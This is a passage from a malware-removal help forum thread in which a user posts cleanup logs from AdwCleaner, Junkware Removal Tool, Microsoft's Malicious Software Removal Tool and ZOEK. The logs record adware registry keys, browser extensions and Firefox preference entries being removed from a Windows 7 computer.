[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.url_history0001.storedInFile", true);

*************************

AdwCleaner[R0].txt - [26259 octets] - [21/01/2015 23:27:28]
AdwCleaner[S0].txt - [27475 octets] - [21/01/2015 23:30:54]

########## EOF - \AdwCleaner\AdwCleaner[S0].txt - [27536 octets] ##########



#################################################################################################################
Junkware Removal Tool:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.1 (12.28.2014:1)
OS: Windows 7 Home Premium x64
Ran by Admin on Thu 01/22/2015 at 19:09:58.87
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows

\CurrentVersion\Explorer\Browser Helper Objects\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{39dd84e0-d7e2-4b5c-88df-6bfebdce6716}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows

\CurrentVersion\Explorer\Browser Helper Objects\{b2ba0648-6833-4057-aaa1-bf9c473dd360}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{b2ba0648-6833-4057-aaa1-bf9c473dd360}



~~~ Files

Successfully deleted: [File] "C:\Windows\wininit.ini"



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 01/22/2015 at 19:13:05.63
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #7 on: January 22, 2015, 10:15:49 PM »
Part 3 (Microsoft's Malicious Software Removal Tool & ZOEK)
#################################################################################################################
Microsoft's Malicious Software Removal Tool:

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.15, December 2012
Started On Sat Dec 15 11:51:29 2012
->Scan ERROR: resource process://pid:3856 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Dec 15 11:53:11 2012


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.16, January 2013
Started On Thu Jan 10 03:02:54 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 10 03:04:22 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.17, February 2013
Started On Thu Feb 14 03:06:07 2013
->Scan ERROR: resource process://pid:2160 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Feb 14 03:10:39 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.18, March 2013
Started On Thu Mar 14 03:04:27 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Mar 14 03:05:59 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.19, April 2013
Started On Thu Apr 11 03:03:07 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Apr 11 03:05:05 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.20, May 2013
Started On Thu May 16 03:05:30 2013
->Scan ERROR: resource process://pid:5396 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 16 03:07:48 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.21, June 2013
Started On Thu Jun 13 03:02:49 2013
->Scan ERROR: resource process://pid:7492 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 13 03:04:52 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.22, July 2013
Started On Wed Jul 10 03:06:40 2013
->Scan ERROR: resource process://pid:1944 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 10 03:09:02 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.2, July 2013 (build 5.2.9201.0)
Started On Sun Jul 14 03:01:13 2013


Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 14 03:03:53 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.3, August 2013 (build 5.3.9301.0)
Started On Thu Aug 15 03:02:19 2013


Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 15 03:04:21 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.4, September 2013 (build 5.4.9400.0)
Started On Thu Sep 12 03:08:19 2013

Engine: 1.1.9800.0
Signatures: 1.157.932.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Sep 12 03:11:27 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.5, October 2013 (build 5.5.9502.0)
Started On Wed Oct 09 03:05:24 2013

Engine: 1.1.9901.0
Signatures: 1.159.530.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Oct 09 03:08:02 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.6, November 2013 (build 5.6.9603.0)
Started On Wed Nov 13 03:03:27 2013

Engine: 1.1.10003.0
Signatures: 1.161.1618.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Nov 13 03:05:32 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.7, December 2013 (build 5.7.9701.0)
Started On Sun Dec 15 03:01:17 2013

Engine: 1.1.10100.0
Signatures: 1.163.1013.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Dec 15 03:03:52 2013


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.8, January 2014 (build 5.8.9803.0)
Started On Thu Jan 16 03:01:29 2014

Engine: 1.1.10201.0
Signatures: 1.165.1273.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 16 03:04:27 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.9, February 2014 (build 5.9.9902.0)
Started On Sun Feb 16 03:00:58 2014

Engine: 1.1.10201.0
Signatures: 1.165.3163.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Feb 16 03:03:41 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.10, March 2014 (build 5.10.10001.0)
Started On Wed Mar 19 03:01:02 2014

Engine: 1.1.10302.0
Signatures: 1.167.1001.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Mar 19 03:04:03 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.11, April 2014 (build 5.11.10100.0)
Started On Thu Apr 10 03:02:06 2014

Engine: 1.1.10401.0
Signatures: 1.169.1258.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Apr 10 03:04:37 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.12, May 2014 (build 5.12.10200.0)
Started On Thu May 15 03:02:55 2014

Engine: 1.1.10502.0
Signatures: 1.173.1305.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 15 03:05:29 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.13, June 2014 (build 5.13.10300.0)
Started On Thu Jun 12 03:05:26 2014

Engine: 1.1.10600.0
Signatures: 1.175.1113.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 12 03:07:31 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.14, July 2014 (build 5.14.10402.0)
Started On Wed Jul 09 03:02:37 2014

Engine: 1.1.10701.0
Signatures: 1.177.949.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 09 03:05:04 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.15, August 2014 (build 5.15.10500.0)
Started On Thu Aug 14 03:07:02 2014

Engine: 1.1.10802.0
Signatures: 1.179.1796.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 14 03:12:18 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.16, September 2014 (build 5.16.10602.0)
Started On Fri Sep 12 03:02:57 2014

Engine: 1.1.10904.0
Signatures: 1.183.882.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Sep 12 03:10:56 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Thu Oct 16 03:00:46 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Oct 16 03:08:17 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.18, November 2014 (build 5.18.10802.0)
Started On Thu Nov 13 03:03:00 2014

Engine: 1.1.11104.0
Signatures: 1.187.1116.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Nov 13 03:09:26 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.19, December 2014 (build 5.19.10902.0)
Started On Thu Dec 11 03:07:14 2014

Engine: 1.1.11202.0
Signatures: 1.189.872.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Dec 11 03:14:26 2014


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.20, January 2015 (build 5.20.11000.0)
Started On Wed Jan 14 22:39:49 2015

Engine: 1.1.11302.0
Signatures: 1.191.1276.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jan 14 22:55:00 2015


Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.20, January 2015 (build 5.20.11000.0)
Started On Thu Jan 22 19:23:42 2015

Engine: 1.1.11302.0
Signatures: 1.191.1276.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 22 19:37:46 2015


Return code: 0 (0x0)



#################################################################################################################
ZOEK:

Zoek.exe v5.0.0.0 Updated 18-01-2015
Tool run by Admin on Thu 01/22/2015 at 19:58:39.83.
Microsoft Windows 7 Home Premium  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Admin\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

1/22/2015 7:59:55 PM Zoek.exe System Restore Point Created Succesfully.

==== Empty Folders Check ======================

C:\PROGRA~2\Malwarebytes' Anti-Malware deleted successfully
C:\PROGRA~2\COMMON~1\Symantec Shared deleted successfully
C:\Program Files\McAfee deleted successfully
C:\Users\Bonnie\AppData\Roaming\Malwarebytes deleted successfully
C:\Users\Bonnie\AppData\Roaming\ZoomBrowser EX deleted successfully
C:\Users\Admin\AppData\Local\VirtualStore deleted successfully
C:\Users\Bonnie\AppData\Local\{17D99C2E-A749-40CB-9D49-D905482C7B57} deleted successfully
C:\Users\Bonnie\AppData\Local\{1B37582B-3250-46F5-A02E-0E6943BCAE9F} deleted successfully
C:\Users\Bonnie\AppData\Local\{2AA6E6AB-09C2-49A8-A318-9B10004A471A} deleted successfully
C:\Users\Bonnie\AppData\Local\{2E838CBA-D2D2-40B8-A487-31DF38890964} deleted successfully
C:\Users\Bonnie\AppData\Local\{2FDE10A0-B070-41F6-B345-7421053C8EB5} deleted successfully
C:\Users\Bonnie\AppData\Local\{3458B4CB-A738-41AB-B0CA-993B17B2B8DD} deleted successfully
C:\Users\Bonnie\AppData\Local\{3AC1F703-8146-44EA-AA81-3E3BAF030DF9} deleted successfully
C:\Users\Bonnie\AppData\Local\{4D086ECD-C43E-447B-8F69-BF18803E5D01} deleted successfully
C:\Users\Bonnie\AppData\Local\{53CB011D-5BA0-4AD9-9FC4-CA605743B036} deleted successfully
C:\Users\Bonnie\AppData\Local\{55E1AF3A-5A85-4E10-A5E9-241B2BDA9485} deleted successfully
C:\Users\Bonnie\AppData\Local\{68CAC9F9-76A4-4655-9F26-34D0314692DF} deleted successfully
C:\Users\Bonnie\AppData\Local\{7310EB10-EC69-4B3D-A309-A54596BBAC7E} deleted successfully
C:\Users\Bonnie\AppData\Local\{73F33929-773E-4D79-B9F8-677553ADA145} deleted successfully
C:\Users\Bonnie\AppData\Local\{88A7AB80-6ECA-4B8F-A416-05EF418B39D6} deleted successfully
C:\Users\Bonnie\AppData\Local\{97659943-31E8-4018-BB4F-16A2A8B17C97} deleted successfully
C:\Users\Bonnie\AppData\Local\{A304BBB8-FDA1-4327-98AB-1DB834BBF335} deleted successfully
C:\Users\Bonnie\AppData\Local\{ABB457B3-39C3-4840-A47D-25C6C01BF0D6} deleted successfully
C:\Users\Bonnie\AppData\Local\{B6A55282-A7A4-465B-9F72-416CF3271FA9} deleted successfully
C:\Users\Bonnie\AppData\Local\{CF3829DA-E92B-4B16-90E7-36BB3427FF18} deleted successfully
C:\Users\Bonnie\AppData\Local\{E738D565-A94B-4F4D-BD01-AF58D216B0A8} deleted successfully
C:\Users\Bonnie\AppData\Local\{E9B08722-28C4-4B96-B477-87C1619B9F7C} deleted successfully
C:\Users\Bonnie\AppData\Local\{EC7E2237-1FE7-4618-BF6A-08A992DB70FC} deleted successfully
C:\Users\Bonnie\AppData\Local\{F883D3A9-FA9F-404D-B551-5E4FEFB8E2C8} deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Windows\CurrentVersion\Ext\Stats

\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Ext\Settings

\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Windows\CurrentVersion\Ext\Settings

\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Low Rights

\ElevationPolicy\{2E422264-6D8A-4ca0-97C7-A2CF868471EA} deleted successfully
HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Low Rights

\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-9ED71DEAF12A} deleted successfully
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{0E8A89AD-95D7-40EB-8D9D-

083EF7066A01} deleted successfully
HKEY_CLASSES_ROOT\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

\{0E8A89AD-95D7-40EB-8D9D-083EF7066A01} deleted successfully

==== Deleting CLSID Registry Values ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}

deleted successfully

==== Running Processes ======================

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
C:\Users\Admin\Desktop\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Deleting Services ======================


==== FireFox Fix ======================

Deleted from C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default\prefs.js:

Added to C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

Deleted from C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\prefs.js:
user_pref("browser.search.order.1", "Secure Search");
user_pref("keyword.URL", "");

Added to C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default

user.js not found
---- Lines browser.startup.page removed from prefs.js ----
user_pref("browser.startup.page", 3);
---- FireFox user.js and prefs.js backups ----

prefs_20150122_0813_.backup

ProfilePath: C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default

user.js not found
---- Lines nspdl removed from prefs.js ----
user_pref("extensions.nspdl.data._dy", "20140623");
user_pref("extensions.nspdl.data.activeDate", "20140515");
user_pref("extensions.nspdl.data.aliveDate", "20140623");
user_pref("extensions.nspdl.data.cc", "us");
user_pref("extensions.nspdl.data.instlDate", "20140422");
user_pref("extensions.nspdl.data.ntopen", "23336556");
user_pref("extensions.nspdl.data.ra-0dd39926325c08d27482ec7852a60095", "dd35d321d1bed7ac906b12cfbe195074");
user_pref("extensions.nspdl.data.ra-462f23bb747e4f70407d053a3297bd0b", "832d47846367971f1f4dfabb314ad640");
user_pref("extensions.nspdl.data.ra-65b71db09f71c6c7d7b2071c59e0da25", "7a658d50963fcf43fbc6e68c0bb5525e");
user_pref("extensions.nspdl.data.ra-872bb23eeaa531e88719b185b415ff36", "df2139a99645b74952aa7fce5f169ab0");
user_pref("extensions.nspdl.data.ra-abc402c70e46e8cc70f0532c455a3c97", "026cde5b6cd59e1f55166cdd3bca3e0b");
user_pref("extensions.nspdl.general.content", "favorites-e3fe6b04f35b134b72f2f0e12ac60849");
user_pref("extensions.nspdl.general.firstRun", false);
user_pref("extensions.nspdl.general.guid", "d38dff45-a78b-45b4-92ec-7cdd9483a221");
user_pref("extensions.nspdl.general.version", "9.5.5");
---- Lines valueApps removed from prefs.js ----
user_pref("valueApps.autoDisableScopes", -1);
user_pref("valueApps.storage.mam_gk_userId",

"64333531636537372D623135652D343266622D396364332D633636653163363162376133");
---- Lines browser.startup.page removed from prefs.js ----
user_pref("browser.startup.page", 3);
---- Lines extensions.FXNqB removed from prefs.js ----
user_pref("extensions.FXNqB.epoch", "1416953868");
user_pref("extensions.FXNqB.url", "http://webdireect.in/sync2/?

q=hfZ9ojtUhMCMCyVUojwMg708BNmGWj8lkGhGheDUojw9rdkGqdw8qjaEpihIC7n0rjnEpjw5rda9qTs5tNhVC
---- Lines extensions.HhBhxJjRP4nqBBXi removed from prefs.js ----
user_pref("extensions.HhBhxJjRP4nqBBXi.epoch", "1421389269");
user_pref("extensions.HhBhxJjRP4nqBBXi.url", "http://liversitions.info/sync2/?

q=hfZ9ofmZhchEAen0rjaErdaEtMqLDe49CNU0llrMCMlNhd9FqjaFrdCErTnHrdrMBzqUoj
---- Lines extensions.VDIQKPIG4 removed from prefs.js ----
user_pref("extensions.VDIQKPIG4.epoch", "1416953870");
user_pref("extensions.VDIQKPIG4.url", "http://discountgetdirect.ru/sync2/?

q=hfZ9oeZMh7Y4tNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda9rjgEqTs9rdrMBzqUojw9rdUFpd
---- Lines extensions.jQuh426B1 removed from prefs.js ----
user_pref("extensions.jQuh426B1.epoch", "1421389270");
user_pref("extensions.jQuh426B1.url", "http://redhatlovesite.org/sync2/?

q=hfZ9ojwGhyhNtNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda4rjkFpjk9qjwMBzqUojw9rdUFpdaE
---- Lines extensions.q5lnQceM removed from prefs.js ----
user_pref("extensions.q5lnQceM.epoch", "1416953869");
user_pref("extensions.q5lnQceM.url", "http://foreveryshare.ru/sync2/?

q=hfZ9oeDGhex9tNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda9rdCGrHr9qdrMBzqUojw9rdUFpdaEqdC
---- Lines extensions.s6ldIyuuS removed from prefs.js ----
user_pref("extensions.s6ldIyuuS.epoch", "1421389269");
user_pref("extensions.s6ldIyuuS.url", "http://astrajobsecure.com/sync2/?

q=hfZ9ojwEhfsHtNbPhd9FtMqLDe49CNU0llrMCMlNhd9Fqda4rjkFpjr9rdnMBzqUojw9rdUFpdaE
---- Lines extensions.uAk3as removed from prefs.js ----
user_pref("extensions.uAk3as.epoch", "1416953870");
user_pref("extensions.uAk3as.url", "http://capelivemega.net/sync2/?

q=hfZ9ojlVCTsMCyVUojwMg708BNmGWj8lkGhGheDUojw9rdCFrdsErjrGpihIC7n0rjnEpjw5rda9qHaGt
---- Lines extensions.zOhdwnYKopX6lVWl removed from prefs.js ----
user_pref("extensions.zOhdwnYKopX6lVWl.epoch", "1421389271");
user_pref("extensions.zOhdwnYKopX6lVWl.url", "http://getjpi77.info/sync2/?

q=hfZ9oen9BihEAen0rchTB6lKDzt4olljtNtVh7n0rjnFrjsHrjsHqTr9tMFHhd9FqdwFrTnGrT
---- FireFox user.js and prefs.js backups ----

prefs_20150122_0813_.backup

==== Deleting Files \ Folders ======================

C:\Users\Bonnie\AppData\LocalLow\{01050D05-D546-B8DC-954D-8334A8A7BF5A} deleted
C:\Users\Bonnie\AppData\LocalLow\{2F344960-763E-9E6C-E973-25241A34D54E} deleted
C:\Users\Bonnie\AppData\LocalLow\{AF9DD42F-F7CD-768B-3561-2FF97518D379} deleted
C:\Users\Bonnie\AppData\LocalLow\{B4552D3D-6B41-9AF1-3067-72A066972344} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{01050D05-D546-B8DC-954D-8334A8A7BF5A} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{2F344960-763E-9E6C-E973-25241A34D54E} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{AF9DD42F-F7CD-768B-3561-2FF97518D379} deleted
C:\Users\Bonnie\AppData\Local\Packages\windows_ie_ac_001\AC\{B4552D3D-6B41-9AF1-3067-72A066972344} deleted
C:\PROGRA~2\WordPerfect Office 12 deleted
C:\PROGRA~2\FamilySearch deleted
C:\Users\Bonnie\AppData\Roaming\WB.CFG deleted
C:\Users\Bonnie\AppData\Roaming\appdataFr2.bin deleted
C:\Users\Bonnie\AppData\Local\CRE deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FamilySearch deleted
C:\Users\Bonnie\AppData\LocalLow\TB deleted
C:\Windows\SysNative\config\systemprofile\Searches deleted
C:\windows\SysNative\GroupPolicy\ADM deleted
C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default\nspdl deleted

==== System Specs ======================

Windows: Windows 7 Home Premium Edition (64-bit) Service Pack 1 (Build 7601)
Memory (RAM): 5888 MB
CPU Info: AMD Phenom(tm) II X6 1065T Processor
CPU Speed: 2971.9 MHz
Sound Card: Realtek Digital Output (Realtek |
Display Adapters: ATI Radeon HD 4250 Graphics  | ATI Radeon HD 4250 Graphics  | RDPDD Chained DD | RDP Encoder

Mirror Driver | RDP Reflector Display Driver
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1680 X 1050 - 32 bit
Network: Network Present
Network Adapters: 802.11n Wireless LAN Card | Realtek PCIe GBE Family Controller
CD / DVD Drives: 1x (D: | ) D: ATAPI   DVD A  DH16ABSH
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 3 Button Wheel Mouse Present
Hard Disks: C:  1379.2GB
Hard Disks - Free: C:  1197.7GB
Manufacturer *: American Megatrends Inc.
BIOS Info: AT/AT COMPATIBLE | 08/16/32 | ACRSYS - 20101104
Time Zone: Mountain Standard Time
Motherboard *: Gateway DX4350
Country: United States
Language: ENU

==== System Specs (Software) ======================

Anti-Virus: Kaspersky Internet Security On-access scanning disabled (Outdated)
Anti-Spyware: Kaspersky Internet Security disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Firewall: Kaspersky Internet Security disabled
Default Browser: Firefox   35.0
Internet Explorer Version: 11.0.9600.17501
Mozilla Firefox version: 35.0 (x86 en-US)
Adobe Reader version: 10.1.13.16
Flash Player version: 16.0.0.257

==== Files Recently Created / Modified ======================

====== C:\Windows ====
====== C:\Users\Admin\AppData\Local\Temp ====
2015-01-23 02:07:17   E0DC8C6BBC787B972A9A468648DBFD85   1008128   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\libiconv2.dll
2015-01-23 02:07:17   D202BAA425176287017FFE1FB5D1B77C   103424   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\libintl3.dll
2015-01-23 02:07:17   57CAC848FA14AE38F14F9441F8933282   140288   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\pcre3.dll
2015-01-23 02:07:17   547C43567AB8C08EB30F6C6BACB479A3   79360   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\regex2.dll
2015-01-23 02:07:17   2E0323A94915FAAB10A25F3BABF82584   157696   ----a-w-   C:\Users\Admin\AppData

\Local\Temp\jrt\erunt\ERUNT.EXE
2015-01-23 02:00:57   97511FE2CA09CC2E06C3CD6519C3494E   43008   ----a-w-   C:\Users\Bonnie\AppData

\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpi9q42z.dll
====== Java Cache =====
====== C:\Windows\SysWOW64 =====
